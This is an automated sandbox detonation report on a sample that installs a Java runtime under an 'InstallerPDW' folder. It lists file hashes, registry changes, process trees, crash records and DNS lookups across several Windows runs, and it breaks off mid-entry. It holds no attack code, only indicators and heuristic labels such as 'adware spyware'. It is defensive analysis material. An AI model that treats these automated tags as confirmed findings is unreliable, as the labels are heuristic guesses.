SHA512 35db507a3918093b529547e991ab6c1643a96258fc95ba1ea7665ff762b0b8abb1ef732b3854663a947effe505be667bd2609ffcccb6409a66df605f971da106

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\gson.jar

MD5 5134a2350f58890ffb9db0b40047195d
SHA1 751f548c85fa49f330cecbb1875893f971b33c4e
SHA256 2d43eb5ea9e133d2ee2405cc14f5ee08951b8361302fdd93494a3a997b508d32
SHA512 c3cdaf66a99e6336abc80ff23374f6b62ac95ab2ae874c9075805e91d849b18e3f620cc202b4978fc92b73d98de96089c8714b1dd096b2ae1958cfa085715f7a

memory/1676-299-0x00000000028B8000-0x00000000028C0000-memory.dmp

memory/1676-298-0x00000000028B0000-0x00000000028B8000-memory.dmp

memory/1676-297-0x0000000000250000-0x0000000000251000-memory.dmp

memory/1676-303-0x00000000028C0000-0x00000000028C8000-memory.dmp

memory/1676-302-0x00000000027F0000-0x0000000002818000-memory.dmp

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-php-sdk.jar

MD5 3e5e8cccff7ff343cbfe22588e569256
SHA1 66756daa182672bff27e453eed585325d8cc2a7a
SHA256 0f26584763ef1c5ec07d1f310f0b6504bc17732f04e37f4eb101338803be0dc4
SHA512 8ea5f31e25c3c48ee21c51abe9146ee2a270d603788ec47176c16acac15dad608eef4fa8ca0f34a1bbc6475c29e348bd62b0328e73d2e1071aaa745818867522

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\dn-compiled-module.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\COPYRIGHT

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zend-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-xml-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\currency.data

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\zt-zip.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\Welcome.html

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME.txt

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-simple.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\slf4j-api.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\release

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\README.txt

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\LICENSE

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\jphp-zip-ext.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\jsse.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\security\java.security

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\net.dll

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\nio.dll

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzdb.dat

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\tzmappings

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\lib\resources.jar

C:\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcp120.dll

\Users\Admin\AppData\Roaming\InstallerPDW\jre\bin\msvcr120.dll

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\X7R8H1BWVVSVKUKXNZ78.temp

C:\Users\Admin\AppData\Roaming\Adobe\Acrobat\9.0\SharedDataEvents

C:\Users\Admin\AppData\Local\Temp\CabC026.tmp

C:\Users\Admin\AppData\Local\Temp\TarC058.tmp

Analysis: behavioral5

Detonation Overview

Submitted: 2024-10-07 02:11
Reported: 2024-10-07 02:15
Platform: win7-20240903-en
Max time kernel: 120s
Max time network: 131s

Command Line

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\LastProcessed = 904123715e18db01 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NTPFirstRun = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\DecayDateQueue = 01000000d08c9ddf0115d1118c7a00c04fc297eb0100000045c0dde48c11474f81d9a2c02be4ea2200000000020000000000106600000001000020000000fc5f2b1b1738ceea365af3753a4a7ca64d79b890c03037e6af8d2c386e40e887000000000e8000000002000020000000e4edbdbb3f7426acf93ffd0d2fd2e1f75088c9e23670eeb3a6dc259181b0f2c420000000dbeae45304b38368d5f75e1d78086ca77839c1705247b10c9e21005a2f7fca9840000000693e3f407565753ede0d3ab93b79d566bf14e509466bbb1614727986931f2fc72ed773fa012de0ca39049653e053aca0b8c704949d251307a158bac28e54d8c9 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion\NextUpdateDate = "434429020" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{9CA62BC1-8451-11EF-87E3-523A95B0E536} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff2400000024000000aa04000089020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\SearchScopes\DownloadRetries = "2" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = … C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\DomainSuggestion C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files\Internet Explorer\iexplore.exe N/A

Processes

C:\Program Files\Internet Explorer\iexplore.exe

"C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\Admin\AppData\Local\Temp\jre\Welcome.html

C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE

"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:2284 CREDAT:275457 /prefetch:2

Network

Country Destination Domain Proto
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp
US 204.79.197.200:443 ieonline.microsoft.com tcp

Files

C:\Users\Admin\AppData\Local\Temp\CabEDDB.tmp

C:\Users\Admin\AppData\Local\Temp\TarEE6A.tmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Analysis: behavioral26

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

91s

Max time network

157s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3372 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3372 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3372 wrote to memory of 4464 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4464 -ip 4464

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4464 -s 640

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 68.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral28

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

89s

Max time network

154s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3904 wrote to memory of 2032 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3904 wrote to memory of 2032 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 3904 wrote to memory of 2032 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\dcpr.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 138.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 103.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 14.227.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral29

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

105s

Max time network

19s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1616 -s 224

Network

N/A

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

150s

Max time network

100s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2032 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2032 wrote to memory of 3320 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JAWTAccessBridge.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 2.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral25

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240708-en

Max time kernel

120s

Max time network

123s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\client\jvm.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1732 -s 228

Network

N/A

Files

N/A

Analysis: behavioral14

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

145s

Max time network

161s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5044 wrote to memory of 4692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5044 wrote to memory of 4692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 5044 wrote to memory of 4692 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge-32.dll,#1

Network

Country Destination Domain Proto
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 22.160.190.20.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 154.239.44.20.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral15

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

117s

Max time network

125s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Signatures

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2416 wrote to memory of 2576 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\JavaAccessBridge.dll,#1

Network

N/A

Files

N/A

Analysis: behavioral17

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge-32.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2352 -s 220

Network

N/A

Files

N/A

Analysis: behavioral20

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

91s

Max time network

160s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4872 wrote to memory of 1628 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4872 wrote to memory of 1628 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 4872 wrote to memory of 1628 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\WindowsAccessBridge.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 452 -p 1628 -ip 1628

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1628 -s 600

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 75.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral30

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win10v2004-20240802-en

Max time kernel

147s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\rundll32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2456 wrote to memory of 976 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2456 wrote to memory of 976 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
PID 2456 wrote to memory of 976 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\decora_sse.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 976 -ip 976

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 976 -s 604

Network

Country Destination Domain Proto
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 71.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 197.87.175.4.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 98.208.201.84.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 18.173.189.20.in-addr.arpa udp

Files

N/A

Analysis: behavioral31

Detonation Overview

Submitted

2024-10-07 02:11

Reported

2024-10-07 02:15

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\jre\bin\deploy.dll,#1

Signatures

Program crash

Description Indicator Process Target
